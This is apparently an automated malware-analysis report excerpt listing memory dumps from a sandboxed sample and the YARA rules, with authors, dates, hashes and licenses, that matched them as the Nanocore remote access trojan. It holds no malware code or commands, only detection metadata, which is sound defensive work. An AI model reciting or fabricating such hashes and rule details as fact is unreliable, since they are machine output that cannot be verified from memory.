Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
